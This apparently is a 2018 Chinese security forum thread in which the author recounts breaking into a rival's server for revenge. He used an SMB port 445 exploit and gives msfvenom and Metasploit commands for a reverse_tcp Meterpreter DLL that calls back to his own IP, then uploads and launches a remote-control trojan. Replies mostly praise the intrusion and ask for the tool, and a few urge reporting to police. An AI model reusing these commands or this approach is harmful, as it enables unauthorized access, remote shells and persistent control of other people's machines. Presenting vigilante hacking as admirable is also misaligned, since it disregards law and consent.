用户
搜索
  • TA的每日心情

    2018-3-2 07:59
  • 签到天数: 8 天

    连续签到: 1 天

    [LV.3]经常看看I

    i春秋作家

    Rank: 7Rank: 7Rank: 7

    30

    主题

    291

    帖子

    3906

    魔法币
    收听
    0
    粉丝
    106
    注册时间
    2017-4-15

    i春秋认证春秋文阁i春秋签约作者

    发表于 2018-1-24 14:56:18 8243293
    本帖最后由 jasonx 于 2018-1-29 16:38 编辑

    创建了一个调戏黑阔的QQ交流群,欢迎大家加入哦,i春秋-赵:689194365


    前言:上一篇文章我们说到用arp攻击可以让对方服务器断网,但是现在这货已经安装了arp防护,arp攻击对他已经无效了。
    上一篇的地址:https://bbs.ichunqiu.com/thread-32952-1-1.html


    先上点他做黑产的截图把。

    2.jpg
    3.jpg

    5.jpg


    0x01 没错,我就是小学生,小学生就是我。
    因为上一篇没拿到权限,这货又开始在群里装逼,嘲讽我了。
    厮可忍? 叔不可忍。必须硬刚让你涨点见识了。

    z1.jpg

    z2.jpg

    z3.jpg

    x0x2 开始突破
    由于之前拿到的C段服务器被发现了,我又重新拿了C段的服务器,扫描邪恶某组的服务器发现445端口开放。之前在外网扫描的时候发现445关闭了的,由此判断,只是外网屏蔽了445,但是内网可以访问。

    3.jpg

    这里很多表哥都知道445端口可以干啥了,一开始我用nsa武器库的exp打了几次没拿到shell。
    然后我空格大表哥赶来支援,掏出了他的黑又硬递给我  (什么鬼?.....口误了.....应该是掏出他的神器递给我)
    应表哥要求,工具我就不透露了。

    咱们先用kali生成一个后门。
    其中的IP要修改成自己外网的ip,如果目标是64位系统的话,windows/meterpreter修改成windows/x64/meterpreter

    [AppleScript] 纯文本查看 复制代码
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=6666 -f dll > x32.dll
    msfconsole
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST 192.168.1.121
    set LPORT 6666
    run


    如下图;


    m2.jpg


    0x03 神器出手,shell到手。

    生成完以后把x32.dll复制到神器下(这里的操作和nsa武器库的差不多,都是成功以后加载这个后门dll文件)
    然后用表哥的神器开始攻击

    sq.jpg

    返回到kali查看,成功返回一个session,已经拿到对方服务器权限。

    m1.jpg

    2.png

    现在咱们上传一个远控文件上去,方便控制。
    [AppleScript] 纯文本查看 复制代码
    upload ts.exe c:\ts.exe 注意:如果失败的话多加一个反斜杠,如下;
    upload ts.exe c:\\ts.exe


    成功以后可以看到箭头指向的就是远控。
    然后切换到shell模式
    在meterpreter 下直接输入shell即可,可以像webshell一样操作。

    qd1.jpg

    然后在shell下启动我们的远控文件。

    qd2.jpg

    可以看到服务器已经上线,现在想干嘛都可以了。

    qd3.jpg

    为那些被你挂黑页的gov还有那些防护薄弱的站点复仇。

    2.jpg
    t2.jpg


    总结:
    我知道你做黑产,你还进去过,也知道你日了不少gov,其中还ddos了某地的公安局网站,这些我都知道。
    但是你他妈骂我小学生,这还能忍?现在请自觉把你的脸伸过来吧。










    评分

    参与人数 6魔法币 +16 收起 理由
    huiji + 1 给大佬点赞
    Lince + 3
    POTASSIUM + 3
    路人的马特利 + 3
    honglouhe + 3 欢迎分析讨论交流,i春秋论坛有你更精彩!.
    pop562742 + 3

    查看全部评分

    本帖被以下淘专辑推荐:

    然而天道已经被抓了
    使用道具 举报 回复

    此处需要好多赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞
    使用道具 举报 回复
    此处需要好多赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞
    使用道具 举报 回复
    此处需要好多赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞
    使用道具 举报 回复

    此处需要好多赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞
    使用道具 举报 回复

    此处需要好多赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞
    使用道具 举报 回复
    发表于 2018-1-24 15:24:21
    此处需要好多赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞
    i春秋“培育信息时代的安全感”!
    使用道具 举报 回复
    http://lawyers.66law.cn/s2c02167466868_anli45131.aspx

      一、被告人李某犯非法控制计算机信息系统罪,判处有期徒刑三年,缓刑四年,罚金人民币一万元。

      (缓刑考验期从判决确定之日起计算。罚金已缴纳。)

      二、扣押在案的作案工具黑色联想牌笔记本电脑,予以没收。


    使用道具 举报 回复
    icq62ef0c2b 发表于 2018-7-18 22:23
    http://lawyers.66law.cn/s2c02167466868_anli45131.aspx
      一、被告人李某犯非法控制计算机信息系统罪, ...

    他现在还在搞DDOS,还吹什么日入一K,需要去找公安机关汇报吗?(哭笑)
    使用道具 举报 回复
    发表于 2018-1-24 15:05:28
    我觉得 还是格盘比较好,或者交给警察叔叔,

    评分

    参与人数 1魔法币 +5 收起 理由
    iamkill + 5

    查看全部评分

    做自己的自己 和平年代的炮灰,战争年代的爆破鬼才
    使用道具 举报 回复
    发表于 2018-1-24 15:07:40
    哦对了 我想了下 还是觉得这种人适合去建长城,从国家的角度讲,这就是内奸行为,日了服务器,倒卖给第三方?,然后让国外的人诈骗中国人?耗子扛枪窝里横?

    评分

    参与人数 1魔法币 +5 收起 理由
    iamkill + 5

    查看全部评分

    做自己的自己 和平年代的炮灰,战争年代的爆破鬼才
    使用道具 举报 回复
    坏蛋 管理员 欢迎大家来春秋群找我玩 秦 楚 燕 魏 齐 赵 春秋文阁
    地板
    发表于 2018-1-24 15:13:35
    为非作歹,把技术用于黑产的行为实在无耻,作为个人的角度,我觉得表哥干得漂亮,给大家出口气。作为平台的角度,我建议告知警察叔叔查他水表,以防未来继续祸害人间,致敬表哥!

    评分

    参与人数 2魔法币 +10 收起 理由
    DYBOY + 5
    iamkill + 5

    查看全部评分

    欢迎加入i春秋QQ群大家庭,每人只能任选加入一个群哦!投稿请加我QQ:286894635。
    i春秋—楚:533191896
    i春秋—韩:556040588
    i春秋CTF交流学习群:234714762
    使用道具 举报 回复
    发表于 2018-1-24 15:14:00
    17010通杀神器啊  我擦
    使用道具 举报 回复
    发表于 2018-1-24 15:21:02
    h3hz 发表于 2018-1-24 15:14
    17010通杀神器啊  我擦

    表哥真识货。
    使用道具 举报 回复
    掏出我的24K纯金茶杯,给大表哥递一杯茶
    使用道具 举报 回复
    当初也搞一下c段一个站,准备劫持失败了就再没搞过,不多说666
    使用道具 举报 回复
    发表于 2018-1-24 17:08:31
    表哥!!神器可以共享一下吗???
    使用道具 举报 回复
    发表于 2018-1-24 17:10:47
    黑客 黑客
    使用道具 举报 回复
    发表于 2018-1-24 17:16:48
    可以可以厉害了
    使用道具 举报 回复
    发表于 2018-1-24 17:35:43
    说实话神器是真的强,很想要
    使用道具 举报 回复
    发表于 2018-1-24 17:45:14
    我觉得可以把他交给警察叔叔
    使用道具 举报 回复
    发表于 2018-1-24 18:06:29
    厉害,话说这c段的服务器都特么太烂了吧。。
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册